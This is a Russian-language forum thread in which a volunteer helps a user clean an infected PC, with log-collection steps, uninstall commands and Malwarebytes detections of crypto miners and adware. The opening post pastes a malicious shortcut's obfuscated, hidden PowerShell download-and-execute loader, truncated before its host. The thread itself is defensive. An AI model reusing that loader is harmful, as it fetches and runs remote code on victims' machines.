Вирус в PowerShell

[Евгений Купрас]

Скачал фильм, запустил .avi файл, а это оказался ярлык с кодом:

:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP &( $verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN'')( ('73w69Y88!40%78%101Y119%45!79c98!106%101!99!116c32c83G121Y115w116v101!109c46w78w101%116u46v87c101Y98%67%108b105:101w110G116%

 

CollectionLog-2018.12.31-00.12.zip

[regist]

1) Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ:

1. Запустите AVZ.
2. Запустите используемый в Вашей системе интернет-браузер (например Internet Explorer, FireFox, Opera и т.д. - если применяется несколько браузеров, то необходимо запустить их все для того чтобы AVZ смог проанализировать используемые браузерами модули расширения и плагины)
3. В AVZ выберите пункт меню Файл - Стандартные скрипты. В открывшемся окне необходимо отметить скрипт №8 ("VirusInfo.Info: Скрипт сбора файлов для экспресс-анализа ПК") и нажать кнопку "Выполнить отмеченные скрипты". Выполнение скрипта займет некоторое время, порядка 1 - 5 мин. В результате в папке AVZ будет создан подкаталог LOG, в нем архив с именем virusinfo_files_<имя_ПК>.zip
4. Закачайте полученный архив, как описано на этой странице.
5. Если размер архива превышает 250 Мб закачайте его на любой файлообменник, не требующий ввода капчи (например: Яндекс.Диск, Zippyshare, My-Files.RU, karelia.ru, Ge.tt или WebFile) и укажите ссылку на скачивание в своём следующем сообщении.

 

2)

Java 8 Update 161 (64-bit) [20180221]-->MsiExec.exe /X{26A24AE4-039D-4CA4-87B4-2F64180161F0}
Java SE Development Kit 8 Update 112 [20170325]-->MsiExec.exe /X{32A3A4F4-B792-11D6-A78A-00B0D0180112}
Java SE Development Kit 8 Update 144 (64-bit) [20170825]-->MsiExec.exe /X{64A3A4F4-B792-11D6-A78A-00B0D0180144}

устаравшая и уязвимая версия Java, деинсталируйте её.
3) Соберите свежие логи Автологером.

4) В работе системы после этого отклонения видно?

[Евгений Купрас]

1)https://yadi.sk/d/NBkJM3ESBu1clw
2)удалил
3)CollectionLog-2018.12.31-01.34.zip
4)визуально ничего нету

[regist]

1)

Служба автоматического обновления программ [2018/01/14 22:22:35]-->C:\Users\User\AppData\Local\Mail.Ru\MailRuUpdater.exe uninstall

советую деинсталировать.

2) - Исправьте с помощью утилиты ClearLNK следующие ярлыки, отчёт о работе прикрепите:
 

C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Start Tor Browser.lnk
C:\Users\User\Desktop\Games\Игровой центр Mail.Ru.lnk
C:\Users\User\Desktop\Programs\Tor Browser\Start Tor Browser.lnk
C:\Users\User\Desktop\Programs\Start Tor Browser.lnk

3) Скачайте Malwarebytes' Anti-Malware. Установите.
На вкладке "Параметры" - "Личный кабинет" ("Settings" - "My Account") нажмите кнопку "Деактивировать ознакомительную Premium-версию".
На вкладке "Проверка" - "Полная проверка" нажмите кнопку "Начать проверку". Дождитесь окончания проверки.
Самостоятельно ничего не удаляйте!!!
Нажмите кнопку "Сохранить результат - Текстовый файл (*.txt)". Имя сохраняемому файлу дайте любое, например, "scan".
Отчёт прикрепите к сообщению.

 

[Евгений Купрас]

ClearLNK-2018.12.31_13.45.27.log

log.txt

[regist]

Удалите в MBAM только

RiskWare.BitCoinMiner, C:\USERS\USER\APPDATA\ROAMING\NHM2\BIN\EXCAVATOR_SERVER\EXCAVATOR.EXE, Проигнорировано пользователем, [706], [486367],1.0.8565
RiskWare.BitCoinMiner, C:\USERS\USER\APPDATA\ROAMING\NHM2\BIN\XMR-STAK-CPU\XMR-STAK-CPU.EXE, Проигнорировано пользователем, [706], [486367],1.0.8565
PUP.Optional.MailRu, C:\USERS\USER\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Проигнорировано пользователем, [246], [454830],1.0.8565
PUP.Optional.NewTabTV, C:\USERS\USER\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOCAL STORAGE\http_ru.newtabtv.com_0.localstorage, Проигнорировано пользователем, [321], [359416],1.0.8565
PUP.Optional.NewTabTV, C:\USERS\USER\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOCAL STORAGE\http_ru.newtabtv.com_0.localstorage-journal, Проигнорировано пользователем, [321], [359416],1.0.8565
PUP.Optional.NewTabTV, C:\USERS\USER\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOCAL STORAGE\http_search.newtabtvsearch.com_0.localstorage, Проигнорировано пользователем, [321], [359410],1.0.8565
PUP.Optional.NewTabTV, C:\USERS\USER\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOCAL STORAGE\http_search.newtabtvsearch.com_0.localstorage-journal, Проигнорировано пользователем, [321], [359410],1.0.8565

и строки около которых PUP.Optional.Amigo.